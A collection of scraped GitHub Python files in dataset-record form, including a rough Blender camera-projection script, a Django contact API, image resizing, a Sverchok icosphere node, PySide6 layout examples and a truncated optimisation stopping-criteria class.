useful if some system has been manually controlled and if the PID should take over.\n In that case, pass the last output variable (the control variable) and it will be set as the starting\n I-term when the PID is set to auto mode.\n :param enabled: Whether auto mode should be enabled, True or False\n :param last_output: The last output, or the control variable, that the PID should start from\n when going from manual mode to auto mode\n \"\"\"\n if enabled and not self._auto_mode:\n # switching from manual mode to auto, reset\n self.reset()\n\n self._integral = (last_output if last_output is not None else 0)\n self._integral = _clamp(self._integral, self.output_limits)\n\n self._auto_mode = enabled\n\n @property\n def output_limits(self):\n \"\"\"\n The current output limits as a 2-tuple: (lower, upper). See also the *output_limts* parameter in\n :meth:`PID.__init__`.\n \"\"\"\n return self._min_output, self._max_output\n\n @output_limits.setter\n def output_limits(self, limits):\n \"\"\"Setter for the output limits\"\"\"\n if limits is None:\n self._min_output, self._max_output = None, None\n return\n\n min_output, max_output = limits\n\n if None not in limits and max_output < min_output:\n raise ValueError('lower limit must be less than upper limit')\n\n self._min_output = min_output\n self._max_output = max_output\n\n self._integral = _clamp(self._integral, self.output_limits)\n self._last_output = _clamp(self._last_output, self.output_limits)\n\n def reset(self):\n \"\"\"\n Reset the PID controller internals, setting each term to 0 as well as cleaning the integral,\n the last output and the last input (derivative calculation).\n \"\"\"\n self._proportional = 0\n self._integral = 0\n self._derivative = 0\n\n self._last_time = _current_time()\n self._last_output = None\n self._last_input = None\n\n\n\n\n\n\n\ndef update():\n dg = bpy.context.evaluated_depsgraph_get() \n dg.update()\n\nimport numpy as np\n\ndef camera_view_bounds_2d(scene, camera_object, mesh_object):\n \"\"\"\n Returns camera space bounding box of the mesh object.\n Gets the camera frame bounding box, which by default is returned without any transformations applied.\n Create a new mesh object based on mesh_object and undo any transformations so that it is in the same space as the\n camera frame. Find the min/max vertex coordinates of the mesh visible in the frame, or None if the mesh is not in view.\n :param scene:\n :param camera_object:\n :param mesh_object:\n :return:\n \"\"\"\n\n \"\"\" Get the inverse transformation matrix. \"\"\"\n matrix = camera_object.matrix_world.normalized().inverted()\n \"\"\" Create a new mesh data block, using the inverse transform matrix to undo any transformations. \"\"\"\n dg = bpy.context.evaluated_depsgraph_get()\n \n ob = mesh_object.evaluated_get(dg) #this gives us the evaluated version of the object. Aka with all modifiers and deformations applied.\n mesh = ob.to_mesh()\n #mesh = mesh_object.to_mesh()\n mesh.transform(mesh_object.matrix_world)\n mesh.transform(matrix)\n\n \"\"\" Get the world coordinates for the camera frame bounding box, before any transformations. \"\"\"\n frame = [-v for v in camera_object.data.view_frame(scene=scene)[:3]]\n\n\n lx = []\n ly = []\n \n for v in mesh.vertices:\n co_local = v.co\n z = -co_local.z\n\n if z <= 0.0:\n \"\"\" Vertex is behind the camera; ignore it. \"\"\"\n continue\n else:\n \"\"\" Perspective division \"\"\"\n frame = [(v / (v.z / z)) for v in frame]\n \n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n \n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n lx.append(x)\n ly.append(y)\n \n mesh_object.to_mesh_clear()\n\n \"\"\" Image is not in view if all the mesh verts were ignored \"\"\"\n if not lx or not ly:\n return None\n\n min_x = np.clip(min(lx), 0.0, 1.0)\n min_y = np.clip(min(ly), 0.0, 1.0)\n max_x = np.clip(max(lx), 0.0, 1.0)\n max_y = np.clip(max(ly), 0.0, 1.0)\n\n \"\"\" Image is not in view if both bounding points exist on the same side \"\"\"\n if min_x == max_x or min_y == max_y:\n return None\n\n \"\"\" Figure out the rendered image size \"\"\"\n render = scene.render\n fac = render.resolution_percentage * 0.01\n dim_x = render.resolution_x * fac\n dim_y = render.resolution_y * fac\n\n return (min_x, min_y), (max_x, max_y)\n\n\n\n\n\n\n\n\ndef randomize_camera(x, y, z, roll=0, pitch=0, yaw=0):\n x = y\n y= x\n z = z\n \n\n pitch = pitch\n roll = roll\n yaw = randint(-yaw/2, yaw/2)\n \n fov = 50.0\n\n pi = 3.14159265\n print(bpy.data.scenes.keys())\n scene = bpy.data.scenes['Scene']\n\n # Set render resolution\n scene.render.resolution_x = 640\n scene.render.resolution_y = 640\n\n # Set camera fov in degrees\n scene.camera.data.angle = fov*(pi/180.0)\n\n # Set camera rotation in euler angles\n scene.camera.rotation_mode = 'XYZ'\n scene.camera.rotation_euler[0] = pitch*(pi/180.0)\n scene.camera.rotation_euler[1] = roll*(pi/180)\n scene.camera.rotation_euler[2] = yaw*(pi/180.0)\n\n # Set camera translation\n scene.camera.location.x = x\n scene.camera.location.y = y\n scene.camera.location.z = z\n update()\n return scene, scene.camera\n\n\ndef get_cordinates(scene, camera, object, filename):\n camera_object = camera\n bounding_box = camera_view_bounds_2d(scene, camera_object, object)\n \n cordinates = {\n 'image': filename,\n 'meshes': {}\n }\n if bounding_box:\n cordinates['meshes'][object.name] = {\n 'x1': bounding_box[0][0],\n 'y1': bounding_box[0][1],\n 'x2': bounding_box[1][0],\n 'y2': bounding_box[1][1]\n }\n return cordinates\n else:\n return None\ndef measure (first, second):\n\n locx = second[0] - first[0]\n locy = second[1] - first[1]\n locz = second[2] - first[2]\n\n distance = sqrt((locx)**2 + (locy)**2 + (locz)**2) \n return distance\n\n\ndef center_obj(obj_camera, point):\n print(point, \" [pooooiint\")\n loc_camera = obj_camera.matrix_world.to_translation()\n\n direction = point - loc_camera\n print(direction, \"diredctr\")\n # point the cameras '-Z' and use its 'Y' as up\n rot_quat = direction.to_track_quat('-Z', 'Y')\n print(rot_quat, rot_quat.to_euler(), \"quat\")\n # assume we're using euler rotation\n obj_camera.rotation_euler = rot_quat.to_euler()\n update()\n eulers = [degrees(a) for a in obj_camera.matrix_world.to_euler()]\n z = eulers[2]\n print(eulers, \"eulsers\")\n distance = measure(point, loc_camera)\n return distance, z\n\ndef percent_offset(distance, z, degrees):\n fov = 50 * .9\n width = 640\n\n new_yaw = 640 / distance / fov\n\n yaw = z + new_yaw\n scene = bpy.data.scenes['_mainScene']\n scene.camera.rotation_mode = 'XYZ'\n scene.camera.rotation_euler[2] = yaw*(pi/180.0)\n update()\n\ndef point_at(obj, target, roll=0):\n obj = obj.matrix_world.to_translation()\n \"\"\"\n Rotate obj to look at target\n\n :arg obj: the object to be rotated. Usually the camera\n :arg target: the location (3-tuple or Vector) to be looked at\n :arg roll: The angle of rotation about the axis from obj to target in radians. \n\n Based on: https://blender.stackexchange.com/a/5220/12947 (ideasman42) \n \"\"\"\n if not isinstance(target, mathutils.Vector):\n target = mathutils.Vector(target)\n #oc = obj.location\n loc = obj\n # direction points from the object to the target\n direction = target - loc\n \n quat = direction.to_track_quat('-Z', 'Y')\n\n # /usr/share/blender/scripts/addons/add_advanced_objects_menu/arrange_on_curve.py\n quat = quat.to_matrix().to_4x4()\n rollMatrix = mathutils.Matrix.Rotation(roll, 4, 'Z')\n\n # remember the current location, since assigning to obj.matrix_world changes it\n loc = loc.to_tuple()\n \n \n obj.matrix_world = quat * rollMatrix\n obj.location = loc\n\n\ndef offset(scene, camera, angle):\n \n angle = angle\n height = 640\n width = 640\n \n if width > height: \n ratio = height / width \n desired_x = (50 / 2) * (angle/100) * ratio\n desired_y = (50 / 2) * (angle/100) \n \n elif height > width:\n ratio = width / height \n desired_x = (50 / 2) * (angle/100)\n desired_y = (50 / 2) * (angle/100) * ratio\n else:\n desired_x = (50 / 2) * (angle/100)\n desired_y = (50 / 2) * (angle/100)\n \n scene.camera.rotation_mode = 'XYZ'\n x = scene.camera.rotation_euler[0]\n y = scene.camera.rotation_euler[2]\n \n change_x = x + (desired_x * (pi / 180.0))\n change_y = y + (desired_y * (pi / 180.0))\n #scene.camera.rotation_euler[0] = change_x \n #scene.camera.rotation_euler[2] = change_y \n update()\n \n\n\n\ndef world_to_camera_view(scene, obj, coord):\n \"\"\"\n Returns the camera space coords for a 3d point.\n (also known as: normalized device coordinates - NDC).\n Where (0, 0) is the bottom left and (1, 1)\n is the top right of the camera frame.\n values outside 0-1 are also supported.\n A negative 'z' value means the point is behind the camera.\n Takes shift-x/y, lens angle and sensor size into account\n as well as perspective/ortho projections.\n :arg scene: Scene to use for frame size.\n :type scene: :class:`bpy.types.Scene`\n :arg obj: Camera object.\n :type obj: :class:`bpy.types.Object`\n :arg coord: World space location.\n :type coord: :class:`mathutils.Vector`\n :return: a vector where X and Y map to the view plane and\n Z is the depth on the view axis.\n :rtype: :class:`mathutils.Vector`\n \"\"\"\n from mathutils import Vector\n print(obj, \"obj\")\n co_local = obj.matrix_world.normalized().inverted() @ coord\n z = -co_local.z\n print(z, \"zx\")\n camera = obj.data\n \n print(camera, \"cam cords\")\n frame = [-v for v in camera.view_frame(scene=scene)[:3]]\n print(frame, \"frame\")\n if camera.type != 'ORTHO':\n if z == 0.0:\n return Vector((0.5, 0.5, 0.0))\n else:\n frame = [(v / (v.z / z)) for v in frame]\n print(frame, \"frame 2\" )\n \n t = [(v * (v.z * z)) for v in frame]\n print(t, \" t\")\n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n\n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n\n return Vector((x, y, z))\ndef camera_to_world_view(scene, obj, coord):\n \"\"\"\n Returns the camera space coords for a 3d point.\n (also known as: normalized device coordinates - NDC).\n Where (0, 0) is the bottom left and (1, 1)\n is the top right of the camera frame.\n values outside 0-1 are also supported.\n A negative 'z' value means the point is behind the camera.\n Takes shift-x/y, lens angle and sensor size into account\n as well as perspective/ortho projections.\n :arg scene: Scene to use for frame size.\n :type scene: :class:`bpy.types.Scene`\n :arg obj: Camera object.\n :type obj: :class:`bpy.types.Object`\n :arg coord: World space location.\n :type coord: :class:`mathutils.Vector`\n :return: a vector where X and Y map to the view plane and\n Z is the depth on the view axis.\n :rtype: :class:`mathutils.Vector`\n \"\"\"\n from mathutils import Vector\n print(obj, \"obj\")\n co_local = obj.matrix_world.normalized().inverted() @ coord\n z = -co_local.z\n\n camera = obj.data\n \n frame = [-v for v in camera.view_frame(scene=scene)[:3]]\n if camera.type != 'ORTHO':\n if z == 0.0:\n return Vector((0.5, 0.5, 0.0))\n else:\n frame = [(v / (v.z / z)) for v in frame]\n\n min_x, max_x = frame[1].x, frame[2].x\n min_y, max_y = frame[0].y, frame[1].y\n\n x = (co_local.x - min_x) / (max_x - min_x)\n y = (co_local.y - min_y) / (max_y - min_y)\n\n return Vector((x, y, z))\n\n\nimport bpy_extras\nmonkey = bpy.data.objects[\"Cube\"]\n\nscene, camera = randomize_camera(0, 0, 0)\n\nscene = bpy.context.scene\n### \ndistance, z = center_obj(camera, monkey.matrix_world.to_translation())\n\n\n#offset(scene, camera, 90)\n\n\n\n\n#amera = bpy.data.objects[\"Camera\"]\n\n\n#co_2d = bpy_extras.object_utils.world_to_camera_view(scene, obj, monkey.location)\n#print(\"2D Coords:\", co_2d)\n\n## If you want pixel coords\n#render_scale = scene.render.resolution_percentage / 100\n#render_size = (\n# int(scene.render.resolution_x * render_scale),\n# int(scene.render.resolution_y * render_scale),\n#)\n#print(\"Pixel Coords:\", (\n# round(co_2d.x * render_size[0]),\n# round(co_2d.y * render_size[1]),\n#))\n\n\n\n#print(distance)\n#R = distance \n#d = 10\n\n#print(R, \"distance\")\n\n#x = sqrt((R**2)-(d**2))\n#print(x)\n\n\n \n \n\n# Test the function using the active object (which must be a camera)\n# and the 3D cursor as the location to find.\n\ndef update1(x):\n print(x, \"curent\")\n x = x / scene.render.resolution_x\n \n camera.rotation_mode = 'XYZ'\n \n x = camera.rotation_euler[2] + (x * (pi / 180.0))\n camera.rotation_euler[2] = x \n \n update()\n \n \n co_2d = bpy_extras.object_utils.world_to_camera_view(scene, obj, co)\n\n # If you want pixel coords\n render_scale = scene.render.resolution_percentage / 100\n \n render_size = (\n int(scene.render.resolution_x * render_scale),\n int(scene.render.resolution_y * render_scale),\n )\n x = round(co_2d.x * render_size[0])\n print(x, \"x cordinate\")\n return x\n#import bpy\n#import bpy_extras\n\nscene = bpy.context.scene\nobj = bpy.context.object\nco = monkey.location\n\n#pixels = 200\n\n#pid = PID(50, 0.01, 0.5, setpoint=pixels)\n#v = update1(pixels)\n#update1(0)\n\n\n#while True:\n# # compute new ouput from the PID according to the systems current value\n# control = pid(v)\n# print(control, \" control\" )\n# v = update1(control)\n# if pixels == v:\n# break\n\n\n\n\n#co_2d = camera_to_world_view(scene, obj, co)\n#print(\"3d Coords:\", co_2d)\n\n\n#obj = bpy.data.objects[\"Camera\"]\n#cube = bpy.data.objects[\"Cube\"]\n\n\n#angle = 2 # or pi/2\n#axis = [0,0,1] # the z axis\n#axis = cube.location.normalized().cross(obj.location.normalized())\n#print(axis)\n#qrot = Quaternion(axis,angle)\n\n\n\n#obj.rotation_mode = 'QUATERNION'\n#obj.rotation_quaternion = qrot # expects a quaternion\n\n\n#print(obj.location.angle(cube.location))\n#print(cube.location, obj.location)\n##.angle(mathutils.Vector((v1.x,v1.y,v1.z)))\n\n\n\n\n\nfrom mathutils import Matrix\n\n\n\n\n\n\n\n\n\n\n\n\n\n\ndef get_calibration_matrix_K_from_blender(camd):\n f_in_mm = camd.lens\n scene = bpy.context.scene\n resolution_x_in_px = scene.render.resolution_x\n resolution_y_in_px = scene.render.resolution_y\n scale = scene.render.resolution_percentage / 100\n sensor_width_in_mm = camd.sensor_width\n sensor_height_in_mm = camd.sensor_height\n pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y\n if (camd.sensor_fit == 'VERTICAL'):\n # the sensor height is fixed (sensor fit is horizontal), \n # the sensor width is effectively changed with the pixel aspect ratio\n s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio \n s_v = resolution_y_in_px * scale / sensor_height_in_mm\n else: # 'HORIZONTAL' and 'AUTO'\n # the sensor width is fixed (sensor fit is horizontal), \n # the sensor height is effectively changed with the pixel aspect ratio\n pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y\n s_u = resolution_x_in_px * scale / sensor_width_in_mm\n s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm\n\n\n # Parameters of intrinsic calibration matrix K\n alpha_u = f_in_mm * s_u\n alpha_v = f_in_mm * s_v\n u_0 = resolution_x_in_px * scale / 2\n v_0 = resolution_y_in_px * scale / 2\n skew = 0 # only use rectangular pixels\n\n K = Matrix(\n ((alpha_u, skew, u_0),\n ( 0 , alpha_v, v_0),\n ( 0 , 0, 1 )))\n return K\n\nK = get_calibration_matrix_K_from_blender(camera.data)\ncoord = Vector([20, 2, 1]) \n5000\ncoord = Vector([-5000, -5000, 3]) \n\nprint(coord) # <Vector (-3.5007, -7.1511, 0.1595)>\n\ntt = K.inverted() @ coord \n\n\ncenter_obj(camera, tt)","repo_name":"Danny-Dasilva/Blender-ML","sub_path":"scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":22904,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"31509849013","text":"\nfrom rent_property.models import ContactUs\nfrom rent_property.Serializers.ContactUsSerializer import ContactUsSerializer\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\n\nclass ContactUsView(APIView):\n def post(self, request):\n serializer = ContactUsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=200)\n return Response(serializer.errors, status=422)\n\n\nclass ContactUsDetailedView(APIView):\n def get(self, request, pk):\n try:\n appartment_info = ContactUs.objects.get(id=pk)\n except Exception as e:\n return Response({\"detail\": str(e)}, status=422)\n\n serializer = ContactUsSerializer(appartment_info)\n return Response(serializer.data)\n\n def put(self, request, pk):\n try:\n contact_info = ContactUs.objects.filter(id=pk).first()\n except Exception as e:\n print(e)\n return Response({\"detail\": \"Id not found in data!\"}, status=422)\n\n request_data = request.data\n\n serializer = ContactUsSerializer(contact_info, data=request_data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data, status=200)\n else:\n return Response(serializer.errors, status=422)\n\n def delete(self, request, pk):\n if pk is not None:\n try:\n apartment_info = ContactUs.objects.get(id=pk)\n apartment_info.delete()\n except Exception as e:\n return Response({\"detail\": str(e)}, status=422)\n else:\n return Response({\"detail\": \"Contact ID not found in request\"}, status=422)\n\n return Response({\"detail\": \"Deleted Job Successfully!\"}, status=200)\n","repo_name":"ShafiUllahNiazi/Rent-a-property","sub_path":"rent_property/Views/ContactUsView.py","file_name":"ContactUsView.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24070489920","text":"# coding:utf-8\nfrom PIL import Image\nimport os\n\ndef compressImage(srcPath, dstPath):\n for filename in os.listdir(srcPath):\n if not os.path.exists(dstPath):\n os.makedirs(dstPath)\n\n srcFile = os.path.join(srcPath, filename)\n dstFile = os.path.join(dstPath, filename)\n print(srcFile)\n print(dstFile)\n\n if os.path.isfile(srcFile):\n sImage=Image.open(srcFile)\n w = 64\n h = 64\n dImage=sImage.resize((w, h), Image.ANTIALIAS)\n dImage.save(dstFile)\n print(dstFile + \"compressed succeeded\")\n\n if os.path.isdir(srcFile):\n compressImage(srcFile, dstFile)\n\n\nif __name__ == '__main__':\n # compressImage('D:/yc_projects/data/images/All_Images', 'D:/yc_projects/data/images/done_dcgan')\n compressImage('D:\\yc_projects\\\\face_dct\\\\face_dect', 'D:\\yc_projects\\\\face_dct\\\\face_dect64x64')\n","repo_name":"AskerYc/tensorflow_ps","sub_path":"zip_pct.py","file_name":"zip_pct.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36220646956","text":"\"\"\"\r\n Script: test_formater.py\r\n By: Shivani Gupta (L00171176)\r\n Tested: Python v3.10.7; Windows 11\r\n Date: 30th October, 2022\r\n\"\"\"\r\n\r\nimport unittest, formater\r\n\r\nclass TestFormater(unittest.TestCase):\r\n def test_lower(self):\r\n test_text = \"SHIVANI\"\r\n result = formater.convert_lower(test_text)\r\n self.assertEqual(result, \"shivani\")\r\n \r\n def test_upper(self):\r\n test_text = \"Shivani\"\r\n result = formater.convert_upper(test_text)\r\n self.assertEqual(result, \"SHIVANI\")\r\n\r\nif __name__ ==\"__main\":\r\n unittest.main()","repo_name":"l00171176/Python","sub_path":"Exercises_09/test_formater.py","file_name":"test_formater.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37776836230","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\nfrom math import pi, sqrt\nimport bpy\nfrom bpy.props import IntProperty, FloatProperty, BoolVectorProperty\nimport bmesh\nfrom mathutils import Matrix, Vector\n\nfrom sverchok.node_tree import SverchCustomTreeNode\nfrom sverchok.data_structure import updateNode\nfrom sverchok.utils.sv_bmesh_utils import numpy_data_from_bmesh\nfrom sverchok.utils.math import from_cylindrical\nfrom sverchok.utils.nodes_mixins.recursive_nodes import SvRecursiveNode\n\n# icosphere parameter rename on sept 13 2021 - this will allow both to exist.\n# https://github.com/blender/blender/commit/9b2b32a3338d873529a9b2c402feae4e9d25afdf\nold_icosphere = \"diameter=\" in bmesh.ops.create_icosphere.__doc__\nsize_param = \"diameter\" if old_icosphere else \"radius\"\n\n\ndef icosahedron_cylindrical(r):\n\n d = 2.0/sqrt(5)\n\n # Calculate icosahedron vertices in cylindrical coordinates\n vertices = []\n vertices.append((0, 0, r))\n for i in range(5):\n vertices.append((d*r, pi/5 + i*2*pi/5, 0.5*d*r))\n for i in range(5):\n vertices.append((d*r, i*2*pi/5, -0.5*d*r))\n vertices.append((0, 0, -r))\n\n edges = []\n for i in range(1,6):\n edges.append((0,i))\n for i in range(1,5):\n edges.append((i, i+1))\n edges.append((1,5))\n for i in range(1,6):\n edges.append((i, i+5))\n for i in range(1,5):\n edges.append((i, i+6))\n edges.append((5,6))\n for i in range(6,10):\n edges.append((i, i+1))\n edges.append((6,10))\n for i in range(6,11):\n edges.append((i, 11))\n\n faces = []\n for i in range(1,5):\n faces.append([0, i, i+1])\n faces.append([0, 5, 1])\n for i in range(1,5):\n faces.append([i, i+6, i+1])\n faces.append([1, 5, 6])\n for i in range(1,5):\n faces.append([i, i+5, i+6])\n faces.append([5, 10, 6])\n for i in range(6,10):\n faces.append([i+1, i, 11])\n faces.append([6, 10, 11])\n\n return vertices, edges, faces\n\ndef icosahedron(r):\n vertices, edges, faces = icosahedron_cylindrical(r)\n vertices = [from_cylindrical(rho, phi, z, 'radians') for rho, phi, z in vertices]\n return vertices, edges, faces\n\nclass SvIcosphereNode(SverchCustomTreeNode, bpy.types.Node, SvRecursiveNode):\n \"\"\"IcoSphere. [default]\n Subdivisions, min (0): [2]\n Radius, min (0): [1.0]\n \"\"\"\n\n bl_idname = 'SvIcosphereNode'\n bl_label = 'IcoSphere'\n bl_icon = 'MESH_ICOSPHERE'\n\n replacement_nodes = [('SphereNode', None, dict(Faces='Polygons'))]\n\n def set_subdivisions(self, value):\n # print(value, self.subdivisions_max)\n if value > self.subdivisions_max:\n self['subdivisions'] = self.subdivisions_max\n else:\n self['subdivisions'] = value\n return None\n\n def get_subdivisions(self):\n return self['subdivisions']\n\n subdivisions: IntProperty(\n name = \"Subdivisions\", description = \"How many times to recursively subdivide the sphere. min=0\",\n default=2, min=0,\n set = set_subdivisions, get = get_subdivisions,\n update=updateNode)\n\n subdivisions_max: IntProperty(\n name = \"Max. Subdivisions\", description = \"Maximum number of subdivisions available\",\n default = 5, min=2,\n update=updateNode)\n\n radius: FloatProperty(\n name = \"Radius\",\n default=1.0, min=0.0,\n update=updateNode, description=\"Sphere radius. min=0\")\n\n # list_match: EnumProperty(\n # name=\"List Match\",\n # description=\"Behavior on different list lengths, object level\",\n # items=list_match_modes, default=\"REPEAT\",\n # update=updateNode)\n out_np: BoolVectorProperty(\n name=\"Output Numpy\",\n description=\"Output NumPy arrays slows this node but may improve performance of nodes it is connected to\",\n default=(False, False, False),\n size=3, update=updateNode)\n\n def sv_init(self, context):\n self['subdivisions'] = 2\n\n self.inputs.new('SvStringsSocket', 'Subdivisions').prop_name = 'subdivisions'\n self.inputs.new('SvStringsSocket', 'Radius').prop_name = 'radius'\n\n self.outputs.new('SvVerticesSocket', \"Vertices\")\n self.outputs.new('SvStringsSocket', \"Edges\")\n self.outputs.new('SvStringsSocket', \"Faces\")\n\n def draw_buttons_ext(self, context, layout):\n layout.prop(self, \"subdivisions_max\")\n layout.prop(self, \"list_match\")\n layout.label(text=\"Output Numpy:\")\n r = layout.row(align=True)\n for i in range(3):\n r.prop(self, \"out_np\", index=i, text=self.outputs[i].name, toggle=True)\n\n def pre_setup(self):\n for s in self.inputs:\n s.nesting_level = 1\n s.pre_processing = 'ONE_ITEM'\n\n def process_data(self, params):\n out_verts = []\n out_edges = []\n out_faces = []\n\n\n for subdivisions, radius in zip(*params):\n if subdivisions == 0:\n # In this case we just return the icosahedron\n verts, edges, faces = icosahedron(radius)\n out_verts.append(verts)\n out_edges.append(edges)\n out_faces.append(faces)\n continue\n\n if subdivisions > self.subdivisions_max:\n subdivisions = self.subdivisions_max\n\n bm = bmesh.new()\n bmesh.ops.create_icosphere(\n bm, **{size_param: radius, \"subdivisions\": subdivisions})\n\n verts, edges, faces, _ = numpy_data_from_bmesh(bm, self.out_np)\n bm.free()\n\n out_verts.append(verts)\n out_edges.append(edges)\n out_faces.append(faces)\n\n return out_verts, out_edges, out_faces\n\n\ndef register():\n bpy.utils.register_class(SvIcosphereNode)\n\ndef unregister():\n bpy.utils.unregister_class(SvIcosphereNode)\n","repo_name":"nortikin/sverchok","sub_path":"nodes/generator/icosphere.py","file_name":"icosphere.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":2098,"dataset":"github-code","pt":"54"} +{"seq_id":"73638786723","text":"class Solution:\n def smallestSubarrays(self, nums: List[int]) -> List[int]:\n last_seen_bit = [0] * 30\n n = len(nums)\n smallest_subarrays = [0] * n\n for index in range(n - 1, -1, -1):\n for bit_index in range(30):\n if nums[index] & (1 << bit_index):\n last_seen_bit[bit_index] = index\n smallest_subarrays[index] = max(1, max(last_seen_bit) - index + 1)\n return smallest_subarrays","repo_name":"Haymanot-Demis/A2SV-Problems","sub_path":"smallest-subarrays-with-maximum-bitwise-or.py","file_name":"smallest-subarrays-with-maximum-bitwise-or.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22241591136","text":"def egcd(a, b):\n if b == 0:\n return a, 1, 0\n else:\n gcd, x, y = egcd(b, a % b)\n return gcd, y, x - (a // b) * y\n\n# Take user input for the number and modulus\na = int(input(\"Enter the number: \"))\nm = int(input(\"Enter the modulus: \"))\n\n# Find the GCD and Bezout's coefficients using the egcd function\ngcd, x, y = egcd(a, m)\n\n# Check if a is invertible modulo m\nif gcd != 1:\n print(a, \"is not invertible modulo\", m)\nelse:\n # Calculate the inverse using Bezout's coefficients\n inverse = x % m\n print(\"The inverse of\", a, \"modulo\", m, \"is\", inverse)\n","repo_name":"Munkhbadral1/MUST-SICT","sub_path":"F.NS250/lab2, 3 Number theorems /integer inverse.py","file_name":"integer inverse.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12122324990","text":"import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom matplotlib import style\nstyle.use('fivethirtyeight')\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n\ndef animate(i):\n graph_data = open('emotion.txt', 'r').read()\n lines = graph_data.split('\\n')\n xs = []\n y_angry = []\n y_fear = []\n y_happy = []\n y_sad = []\n y_surprise = []\n y_neutral = []\n for line in lines:\n if len(line) > 1:\n time, angry, fear, happy, sad, surprise, neutral = line.split(',')\n xs.append(time)\n y_angry.append(angry)\n y_fear.append(fear)\n y_happy.append(happy)\n y_sad.append(sad)\n y_surprise.append(surprise)\n y_neutral.append(neutral)\n\n ax1.clear()\n ax1.plot(xs, y_angry)\n ax1.plot(xs, y_fear)\n ax1.plot(xs, y_happy)\n ax1.plot(xs, y_sad)\n ax1.plot(xs, y_surprise)\n ax1.plot(xs, y_neutral)\n\nani = animation.FuncAnimation(fig, animate, interval=1000)\nplt.show()\n","repo_name":"JostineHo/real-time_emotion_analyzer","sub_path":"live-plotting.py","file_name":"live-plotting.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"54"} +{"seq_id":"17061805154","text":"from PySide6.QtWidgets import (\n QApplication, QMainWindow, QLabel, QHBoxLayout, QVBoxLayout, QWidget)\nimport sys\n\n\nclass Caja(QLabel):\n def __init__(self, color):\n super().__init__()\n self.setStyleSheet(f\"background-color:{color}\")\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # creamos diferentes layouts para mezclar\n layoutHor = QHBoxLayout()\n layoutVer1 = QVBoxLayout()\n layoutVer2 = QVBoxLayout()\n\n # añadimos una caja al principio del layaout 1\n layoutHor.addWidget(Caja(\"green\"))\n # luego anidamos dos layouts verticales\n layoutHor.addLayout(layoutVer1)\n layoutHor.addLayout(layoutVer2)\n\n # en el primer layout vertical añadimos dos cajas\n layoutVer1.addWidget(Caja(\"blue\"))\n layoutVer1.addWidget(Caja(\"red\"))\n\n # en el segundo layout vertical añadimos tres cajas\n layoutVer2.addWidget(Caja(\"orange\"))\n layoutVer2.addWidget(Caja(\"magenta\"))\n layoutVer2.addWidget(Caja(\"purple\"))\n\n # cremos el widget dummy y le asignamos el layout horizontal\n widget = QWidget()\n widget.setLayout(layoutHor)\n\n self.setCentralWidget(widget)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MainWindow()\n window.show()\n sys.exit(app.exec_())\n","repo_name":"hektorprofe/curso-qt-pyside-udemy","sub_path":"Teoría/04 Formas de organización/4-3 Layouts anidados/programa.py","file_name":"programa.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"es","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"74732012961","text":"from paref.interfaces.moo_algorithms.blackbox_function import BlackboxFunction\nfrom paref.interfaces.moo_algorithms.stopping_criteria import StoppingCriteria\n\n\nclass MaxIterationsReached(StoppingCriteria):\n \"\"\"Stopping criteria based on a maximal number of iterations\n\n If a defined maximum of iterations is reached, this stopping criteria is met.\n\n Examples\n --------\n\n Initialze stopping criteria\n\n >>> stopping_criteria = MaxIterationsReached(max_iterations=1)\n\n Evaluate stopping criteria - since this is the first iteration the stopping criteria is not met\n\n >>> stopping_criteria()\n False\n\n Since the max iterations (=1) are reached the stopping criteria is met\n\n >>> stopping_criteria()\n True\n\n \"\"\"\n\n def __init__(self, max_iterations: int = 50):\n \"\"\"\n\n Parameters\n ----------\n max_iterations : int\n maximum number of iterations\n \"\"\"\n self._iteration_step = 0\n self._max_iterations = max_iterations\n\n def 